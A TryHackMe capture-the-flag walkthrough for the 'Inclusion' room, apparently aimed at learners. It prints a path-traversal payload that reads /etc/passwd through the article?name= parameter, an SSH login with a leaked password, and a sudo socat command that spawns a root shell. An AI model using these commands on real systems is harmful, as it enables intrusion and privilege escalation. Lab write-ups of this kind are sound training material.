TryHackMe: Inclusion writeup/walkthrough
Writeup/tutorial for the room ‘Inclusion’ on TryHackMe
Room Link | Easy difficulty
As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer
Task 1: Deploy
Deploy the machine and in the meantime, connect to the THM network:
sudo openvpn --config <your_vpn_file>Task 2: Root it!
#1. user flag and root flag
Since this is a room on Local File Inclusion, let’s look for other pages where we can change directories. Go to their website and look around.
There should be a LFI-attack section with a button to view. Click on it and go the page. If you check the URL, you will see something similar:
<Machine_IP>/article?name=lfiattack
We can exploit the name value here as it is referring to a file called lfiattack and in this case we are going to refer it to a different file, /etc/passwd file.
If we replace lfiattack in the URL with the following:../../../../../../../etc/passwdThen we get the following URL:<Machine_IP>/article?name=../../../../../../../etc/passwd
We now see the etc/passwd file content being dumped on our webpage.
When you read through it, you’ll see that there is a user named falconfeast whose password is here. I took a guess from here and decided to try this on on ssh on the default port and it worked!
ssh falconfeast@<Machine_IP>
<Enter falconfeast's password> We can find the user flag in the current directory.
ls
cat user.txtNow for the root flag. Let’s check if we can run anything with higher privileges.
sudo -l# This reveals that we can run /usr/bin/socat with root privilege and to get the command that we will use to exploit socat, we can go to Gtfobins and search for socat there. The command to use to get higher privilege is:sudo -u root /usr/bin/socat stdin exec:/bin/sh
id# As the output of the id command shows, we are root! Now let's get the root flag.cd /root
cat root.txt
That’s all for this room. Follow me for more write-ups!